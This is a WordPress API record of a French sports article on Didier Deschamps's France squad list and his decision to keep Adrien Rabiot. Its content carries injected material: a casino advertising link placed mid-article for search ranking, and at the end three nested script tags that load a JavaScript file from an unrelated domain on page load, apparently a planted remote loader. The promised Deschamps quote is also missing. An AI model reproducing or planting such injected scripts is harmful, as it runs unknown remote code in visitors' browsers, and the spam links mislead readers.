{"id":3929,"date":"2025-11-20T03:49:12","date_gmt":"2025-11-20T03:49:12","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3929"},"modified":"2026-02-02T22:11:52","modified_gmt":"2026-02-02T22:11:52","slug":"om-deschamps-selectionne-rabiot-et-se-justifie","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/om-deschamps-selectionne-rabiot-et-se-justifie\/","title":{"rendered":"OM : Deschamps s\u00e9lectionne Rabiot et se justifie"},"content":{"rendered":"<h1>OM : Deschamps s\u00e9lectionne Rabiot et se justifie<\/h1>\n<p>Le temps presse pour l\u2019\u00e9quipe de France. \u00c0 moins d\u2019un an du coup d\u2019envoi de la Coupe du Monde 2026 (11 juin \u2013 19 juillet, aux \u00c9tats-Unis, au Canada et au Mexique), Didier Deschamps entame la derni\u00e8re ligne droite de son mandat avec quatre rassemblements restants. La campagne qualificative d\u00e9marre d\u00e8s la semaine prochaine : les Bleus d\u00e9fieront l\u2019Ukraine \u00e0 Wroc\u0142aw (Pologne), le 5 septembre, puis recevront l\u2019Islande au Parc des Princes quatre jours plus tard.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-vittel-fr.com\/contato\/\" target=\"_blank\" rel=\"dofollow\">Support client de Casino Vert \u2764\ufe0f : un service disponible 24h\/24<\/a><\/strong> &#8211; casino vittel Service client\uff1aUn Accompagnement Exemplaire 24h\/24 pour Tous les Joueurs Le service client du casino vittel est-il \u00e0 la hauteur de vos attentes<\/p><\/blockquote>\n<p>Apr\u00e8s avoir d\u00e9croch\u00e9 une troisi\u00e8me place en Ligue des Nations en juin dernier face \u00e0 l\u2019Allemagne, le s\u00e9lectionneur tricolore a d\u00e9cid\u00e9 d\u2019apporter de la continuit\u00e9 tout en ouvrant la porte \u00e0 de nouveaux visages. Dans les cages, Mike Maignan, Lucas Chevalier et Brice Samba sont logiquement retenus. En d\u00e9fense, Jules Kound\u00e9, William Saliba et Dayot Upamecano effectuent leur retour apr\u00e8s avoir manqu\u00e9 le pr\u00e9c\u00e9dent rassemblement, tandis que Malo Gusto profite de sa progression pour s\u2019installer dans le groupe, au d\u00e9triment de Benjamin Pavard.<\/p>\n<h2>Rabiot maintenu, Akliouche r\u00e9compens\u00e9<\/h2>\n<p>Le secteur du milieu de terrain attire particuli\u00e8rement l\u2019attention. Alors que son avenir \u00e0 l\u2019OM est en suspens apr\u00e8s son accrochage avec Jonathan Rowe, Adrien Rabiot conserve la confiance de Didier Deschamps. L\u2019ancien Turinois fait figure de cadre indispensable dans la rotation. Aur\u00e9lien Tchouam\u00e9ni, Manu Kon\u00e9 et Kh\u00e9phren Thuram compl\u00e8tent un entrejeu rajeuni, ce dernier signant son grand retour apr\u00e8s presque deux ans d\u2019absence.<\/p>\n<p>En attaque, le s\u00e9lectionneur reste fid\u00e8le \u00e0 ses hommes forts : Kylian Mbapp\u00e9, Ousmane Demb\u00e9l\u00e9, Marcus Thuram et Bradley Barcola sont pr\u00e9sents, tout comme Michael Olise, qui s&#x27;impose de plus en plus comme le meneur du jeu du Bayern Munich. Mais deux noms retiennent particuli\u00e8rement l\u2019attention : Rayan Cherki, qui confirme sa bonne dynamique, et surtout Maghnes Akliouche. Le joueur de l\u2019AS Monaco, qui sort de deux bonnes saisons en Ligue 1, est convoqu\u00e9 pour la premi\u00e8re fois avec les A.<\/p>\n<p>En revanche, certains absents marquent les esprits. Randal Kolo Muani, encore bloqu\u00e9 dans une impasse au PSG, n\u2019a pas \u00e9t\u00e9 rappel\u00e9, faute de temps de jeu et de condition physique. M\u00eame constat pour Hugo Ekitike, pourtant excellent sous les couleurs de Liverpool depuis le d\u00e9but de la saison.<\/p>\n<h2>Deschamps clarifie son choix sur Rabiot<\/h2>\n<p>Interrog\u00e9 sur le cas particulier d\u2019Adrien Rabiot, Didier Deschamps a tenu \u00e0 expliquer sa d\u00e9cision de maintenir sa confiance au milieu de terrain marseillais, malgr\u00e9 la pol\u00e9mique n\u00e9e de sa bagarre avec Jonathan Rowe. Le s\u00e9lectionneur a insist\u00e9 sur son importance dans le collectif et sur sa volont\u00e9 de l\u2019accompagner dans cette p\u00e9riode d\u00e9licate :<\/p>\n<p>Un discours mesur\u00e9, o\u00f9 Deschamps confirme \u00e0 la fois son soutien au joueur et son attachement \u00e0 l\u2019\u00e9quilibre collectif.<\/p>\n<h2>La liste compl\u00e8te :<\/h2>\n<p><strong>Gardiens\u00a0:<\/strong> Mike Maignan (AC Milan), Lucas Chevalier (PSG), Brice Samba (Rennes)<\/p>\n<p><strong>D\u00e9fenseurs\u00a0:<\/strong> Ibrahima Konat\u00e9 (Liverpool), Lucas Hernandez (PSG), Malo Gusto (Chelsea), Dayot Upamecano (Bayern Munich), Jules Kound\u00e9 (FC Barcelone) Lucas Digne (Aston Villa), Th\u00e9o Hernandez (Al-Hilal), William Saliba (Arsenal)<\/p>\n<p><strong>Milieux de terrain\u00a0:<\/strong> D\u00e9sir\u00e9 Dou\u00e9 (PSG), Aur\u00e9lien Tchouam\u00e9ni (Real Madrid), Manu Kon\u00e9 (AS Rome), Adrien Rabiot (Marseille), Khephren Thuram (Juventus), Maghnes Akliouche (AS Monaco)<\/p>\n<p><strong>Attaquants\u00a0:<\/strong> Bradley Barcola (PSG), Ousmane Demb\u00e9l\u00e9 (PSG), Kylian Mbapp\u00e9 (Real Madrid), Michael Olise (Bayern Munich), Marcus Thuram (Inter Milan), Rayan Cherki (Manchester City)<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OM : Deschamps s\u00e9lectionne Rabiot et se justifie Le temps presse pour l\u2019\u00e9quipe de France. \u00c0 moins d\u2019un an du coup d\u2019envoi de la Coupe du Monde 2026 (11 juin&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3929","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3929","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3929"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3929\/revisions"}],"predecessor-version":[{"id":14905,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3929\/revisions\/14905"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3929"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3929"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3929"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}